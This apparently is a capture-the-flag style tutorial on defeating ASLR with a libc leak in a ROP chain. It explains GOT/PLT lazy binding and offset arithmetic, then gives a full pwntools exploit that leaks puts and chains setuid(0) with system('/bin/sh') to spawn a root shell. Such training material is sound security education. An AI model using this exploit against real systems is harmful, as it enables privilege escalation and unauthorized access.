What is libc?
libc is the standard C library on Linux. It provides core functions like:
- printf (to print formatted text)
- puts (to print strings)
- system (to run system commands like /bin/sh)
- malloc (to allocate memory)
- free (to deallocate memory)
- read (to read from file descriptors)
- write (to write to file descriptors)
- execve (to execute programs)
- fork (to create new processes)
- open (to open files)
- close (to close file descriptors)
- ...and many others.
In short, libc is the toolbox that almost every program uses to get basic tasks done.
Why Do We Need to Leak libc?
In Return Oriented Programming (ROP), you are trying to hijack the control flow of a program to achieve your goals, like spawning a shell. However, most binaries do not include direct access to functions like system("/bin/sh"). Instead:
- The function system exists inside libc, not in the program itself.
- To call system, you need its address in memory.
The libc toolbox is shared across programs to save space and increase efficiency. Instead of bundling these functions with every program, they are stored in one centralized library file that is mapped into each process at run time. On Linux, libc is stored as a shared object (e.g., /lib/x86_64-linux-gnu/libc.so.6).
Here’s where things get tricky:
- Modern systems use ASLR (Address Space Layout Randomization), which randomizes the memory addresses of loaded libraries, including libc.
- This means the address of libc changes every time the program runs.
- So you can't hardcode the address of system or /bin/sh in your exploit.
Solution: Calculate libc base address
Leak the address of a function (like puts) inside libc. Then use that leak to calculate the base address of libc.
Once you know the base address, you can calculate the address of any function in libc, such as system.
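To make the arithmetic concrete, here is a minimal sketch in plain Python. The two offsets are the ones this article finds for its specific libc build; the two leaked addresses are made-up values standing in for two separate runs under ASLR, and libc_base_from_leak is a hypothetical helper name.

```python
# Offsets inside one specific libc build (taken from the readelf output in this article).
PUTS_OFFSET = 0x84420
SYSTEM_OFFSET = 0x52290


def libc_base_from_leak(leaked_puts: int) -> int:
    """Subtract the known offset of puts from its leaked runtime address."""
    return leaked_puts - PUTS_OFFSET


# Hypothetical leaks from two separate runs: ASLR moves the base each time,
# but the distance between puts and system stays the same.
for leaked_puts in (0x7F3A1C284420, 0x7FD5E0A84420):
    base = libc_base_from_leak(leaked_puts)
    system_addr = base + SYSTEM_OFFSET
    print(f"puts={leaked_puts:#x} base={base:#x} system={system_addr:#x}")
```

The base changes between runs, while the offsets do not. That is why a single leak is enough to locate everything else in libc.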
libc Leak
You leak the address of a function in libc (like puts or printf) that is already being used by the program. Here’s how this works:
The GOT (Global Offset Table):
- The program contains a table (GOT) that holds the runtime addresses of functions in libc.
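- When a program first starts (with lazy binding enabled), the GOT entries do not yet hold libc addresses; each one still points back into its PLT stub, so it counts as unresolved.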
- Once a function is called for the first time, its actual address is resolved and stored in the GOT.
- All subsequent calls to that function will use the stored address directly.
The PLT (Procedure Linkage Table):
- The PLT is a series of small code stubs that handle the dynamic linking process.
- When a libc function is called for the first time:
  - The call goes to the PLT entry.
  - The PLT stub jumps through the function's GOT entry, which at this point still leads back to the resolver path.
  - The dynamic linker is called to find the actual address.
  - The address is stored in the GOT for future use.
- This process is called "lazy binding" because addresses are only resolved when needed.
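The GOT/PLT interplay described above can be illustrated with a toy model in Python. This is only a sketch of the idea: ToyProcess and its methods are hypothetical names, the runtime address is made up, and the real work is done by machine-code stubs and the dynamic linker rather than by anything resembling this class.

```python
# Toy model only: the real mechanism lives in PLT stubs and the dynamic linker (ld.so).
class ToyProcess:
    def __init__(self, libc_symbols):
        self.libc_symbols = libc_symbols  # name -> runtime address inside libc
        self.got = {}                     # name -> callable yielding the jump target
        self.resolver_calls = 0

    def import_symbol(self, name):
        # Before the first call, the GOT slot leads to the resolver, not to libc.
        self.got[name] = lambda: self._resolve(name)

    def _resolve(self, name):
        # Stand-in for the dynamic linker: look up the symbol and patch the GOT slot.
        self.resolver_calls += 1
        address = self.libc_symbols[name]
        self.got[name] = lambda: address
        return address

    def call_via_plt(self, name):
        # The PLT stub jumps through whatever the GOT slot currently holds.
        return self.got[name]()


proc = ToyProcess({"puts": 0x7F3A1C284420})  # hypothetical runtime address
proc.import_symbol("puts")
first = proc.call_via_plt("puts")   # goes through the resolver once
second = proc.call_via_plt("puts")  # uses the patched GOT slot directly
print(hex(first), hex(second), proc.resolver_calls)
```

After the first call the GOT slot holds the real address. That is why leaking puts@got only works for a function the program has already called.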
The Leak:
- By calling puts and passing the address of puts@got, the program will print the actual runtime address of puts in libc.
puts_address = u64(io.recvline()[:-1].ljust(8, b'\x00'))
- Once you get this address, you can subtract the known offset of puts in libc to calculate the base address of libc. Be aware that the libc base address must end with 000, because libraries are mapped at page-aligned addresses. If it does not, the leak or the offset is wrong.
libc_base = puts_address - puts_offset
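The parsing step can be reproduced with the standard library alone, which shows what the u64(...ljust(8, ...)) expression is doing. In this sketch, parse_leak is a hypothetical helper, the received line is a made-up example of what puts might print, and the offset is the one this article finds for its libc.

```python
import struct

PUTS_OFFSET = 0x84420  # offset of puts in the libc used in this article


def parse_leak(line: bytes) -> int:
    # Stdlib equivalent of u64(line[:-1].ljust(8, b"\x00")) from pwntools.
    raw = line[:-1]              # drop the newline that puts appends
    raw = raw.ljust(8, b"\x00")  # puts stops at the first NUL byte, so pad back to 8 bytes
    return struct.unpack("<Q", raw)[0]  # little-endian unsigned 64-bit integer


# Hypothetical output of puts(puts@got): six address bytes followed by a newline.
line = bytes.fromhex("2044281c3a7f") + b"\n"

leak = parse_leak(line)
libc_base = leak - PUTS_OFFSET

# Sanity check: a correct base is page-aligned, so its last three hex digits are 000.
assert libc_base & 0xFFF == 0, "wrong libc version or wrong offset"
print(f"leak={leak:#x} libc_base={libc_base:#x}")
```

The padding is needed because user-space addresses on x86-64 have two zero high bytes, and puts stops printing at the first zero byte.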
Why is the Base Address Important?
With the base address, you can calculate the addresses of other useful functions like system, execve, setuid, or gadgets.
You can find out which libc file the program loads with ldd <program>.
System
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
1430: 0000000000052290 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5
The offset of system is 0x52290.
- For example, to get the address of system:
system_address = libc_base + 0x52290
Setuid
- To get the address of setuid:
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep setuid
25: 00000000000e4150 152 FUNC WEAK DEFAULT 15 setuid@@GLIBC_2.2.5
The offset of setuid is 0xe4150.
setuid_address = libc_base + 0xe4150
Binsh
- To get the address of /bin/sh:
$ strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
1b45bd /bin/sh
The offset of /bin/sh is 0x1b45bd.
binsh_address = libc_base + 0x1b45bd
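If you prefer not to copy offsets by hand, the tool output shown above can be parsed directly. The following is a small sketch: both helper functions are hypothetical names, they assume the column layout seen in the sample lines from this article, and the base address is a made-up value.

```python
def offset_from_readelf(line: str) -> int:
    """Return the Value column (second field) of a `readelf -s` symbol line."""
    return int(line.split()[1], 16)


def offset_from_strings(line: str) -> int:
    """Return the leading hex offset of a `strings -a -t x` output line."""
    return int(line.split()[0], 16)


# Sample lines copied from the command output in this article.
readelf_line = "1430: 0000000000052290 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5"
strings_line = "1b45bd /bin/sh"

system_offset = offset_from_readelf(readelf_line)
binsh_offset = offset_from_strings(strings_line)

libc_base = 0x7F3A1C200000  # hypothetical base obtained from a leak
print(f"system @ {libc_base + system_offset:#x}")
print(f"/bin/sh @ {libc_base + binsh_offset:#x}")
```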
Actual Libc Leak in 4 steps
Step 1: POP RDI
- POP_RDI (Gadget)
The pop rdi; ret gadget is required to load the address of puts@got into the rdi register, which is the first argument for the puts function.
$ ropper -f binary | grep rdi
Example output:
0x0000000000402043: pop rdi; ret;
POP_RDI = p64(0x402043)
Step 2: puts@got (Global Offset Table entry)
The puts@got entry holds the runtime address of the puts function in libc. This is what you leak to calculate the base address of libc.
$ readelf -r binary | grep puts
000000405020 000200000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
puts_got = p64(0x405020) #p64(elf.got['puts'])
Step 3: puts@plt (Procedure Linkage Table entry)
The PLT entry for puts acts like a stub that forwards the call to the actual function. This is where you want to call puts with puts@got as the argument.
Find the PLT entry for puts:
$ objdump -d binary | grep plt
401f18: e8 73 f1 ff ff call 401090 <puts@plt>
puts_plt = p64(0x401090) #p64(elf.plt['puts'])
Step 4: Return Address (Entry Point or Main)
After leaking the libc address, you want the program to restart so you can send the next stage of your ROP chain.
return_address = p64(0x401ed5) #p64(elf.symbols['challenge'])
Explanation:
- pop rdi; ret: Sets up rdi to point to puts@got.
- puts@plt: Calls the puts function, which will print the address stored in puts@got.
- main or entry point: Restarts the program so you can send your second stage payload.
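Put together, the four pieces form the first-stage payload. The sketch below builds it with the standard library only, to show the exact byte layout. The p64 function here is a local stand-in for the pwntools function of the same name, the addresses are the example values from the steps above, and the padding of 136 bytes is an assumption that matches the full exploit in this article (it differs per binary).

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (local stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


POP_RDI = 0x402043   # pop rdi; ret gadget
PUTS_GOT = 0x405020  # GOT slot holding the runtime address of puts
PUTS_PLT = 0x401090  # PLT stub used to call puts
RESTART = 0x401ED5   # function to return to for the second stage
PADDING = 136        # assumption: bytes needed to reach the saved return address

stage1 = b"A" * PADDING
stage1 += p64(POP_RDI)   # 1. pop the next value into rdi
stage1 += p64(PUTS_GOT)  # 2. rdi = address of puts@got
stage1 += p64(PUTS_PLT)  # 3. puts(puts@got) prints the runtime address of puts
stage1 += p64(RESTART)   # 4. run the vulnerable function again

print(len(stage1))
print(stage1[PADDING:].hex())
```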
What now?
Look up the offset of the puts symbol in libc:
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
- Send this payload to the program.
- Capture the output, which will print the runtime address of puts in libc.
io.sendline(payload)
leak = u64(io.recvline()[:-1].ljust(8, b'\x00'))
The offset of puts is constant within a specific libc version. Once you have leaked the runtime address of puts (the value stored in puts@got), you can calculate the base address of libc:
libc.address = leak - 0x84420 #libc.symbols['puts']
Calculate the addresses of system, setuid, and binsh
From there, you can calculate the addresses of other symbols like system, setuid and /bin/sh:
BINSH = libc.address + 0x1b45bd #next(libc.search(b"/bin/sh"))
SYSTEM = libc.address + 0x52290 #libc.sym["system"]
SETUID = libc.address + 0xe4150 #libc.sym["setuid"]
After that we can execute the ROPchain to spawn a root shell as shown in the full automatic exploit example.
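As a rough sketch of what that second stage looks like in bytes, the following builds the chain from a libc base using only the standard library. build_stage2 is a hypothetical helper, the base address is made up, the offsets and the gadget address are the example values from this article, and the default padding of 136 is an assumption carried over from the full exploit.

```python
import struct

# Offsets for the specific libc used in this article.
SYSTEM_OFFSET = 0x52290
SETUID_OFFSET = 0xE4150
BINSH_OFFSET = 0x1B45BD
POP_RDI = 0x402043  # pop rdi; ret gadget inside the target binary


def build_stage2(libc_base: int, padding: int = 136) -> bytes:
    """Chain setuid(0) followed by system("/bin/sh")."""
    chain = [
        POP_RDI, 0, libc_base + SETUID_OFFSET,        # setuid(0)
        POP_RDI, libc_base + BINSH_OFFSET,            # rdi = address of "/bin/sh"
        libc_base + SYSTEM_OFFSET,                    # system("/bin/sh")
    ]
    return b"A" * padding + b"".join(struct.pack("<Q", q) for q in chain)


stage2 = build_stage2(0x7F3A1C200000)  # hypothetical base from the leak
print(len(stage2))
```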
Fully automatic ROPchain with libc leak to spawn a root shell
from pwn import *
exe = "/challenge/babyrop_level8.1"
elf = context.binary = ELF(exe, checksec=True)
context.clear(arch="amd64")
context.log_level = "info"
context.terminal = ["tmux", "splitw", "-h"]
def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)
gdbscript = """
"""
io = start()
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
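POP_RDI = 0x402043 # pop rdi; ret gadget found with ropper
RET = 0x40101a # presumably a plain ret gadget; not used below, but can be inserted before system if the stack needs realigning
payload = b'A' * 136 # padding up to the saved return address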
##### LEAK GOT #####
payload += p64(POP_RDI)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(elf.symbols['challenge'])
io.sendline(payload)
##### PARSE OUTPUT #####
io.recvuntil(b'Leaving!\n')
leak = u64(io.recvline()[:-1].ljust(8, b'\x00'))
log.success("Leak %#x", leak)
libc.address = leak - libc.symbols['puts']
BINSH = next(libc.search(b"/bin/sh"))
SYSTEM = libc.sym["system"]
SETUID = libc.sym["setuid"]
log.success(f"libc base @ {hex(libc.address)}")
log.info(f"/bin/sh @ {hex(BINSH)}")
log.info(f"system @ {hex(SYSTEM)}")
log.info(f"setuid @ {hex(SETUID)}")
##### SECOND PAYLOAD #####
## SETUID ##
payload2 = b'A' * 136
payload2 += p64(POP_RDI)
payload2 += p64(0x0) # Root
payload2 += p64(SETUID)
## /bin/sh ##
payload2 += p64(POP_RDI)
payload2 += p64(BINSH)
payload2 += p64(SYSTEM)
io.sendline(payload2)
io.interactive()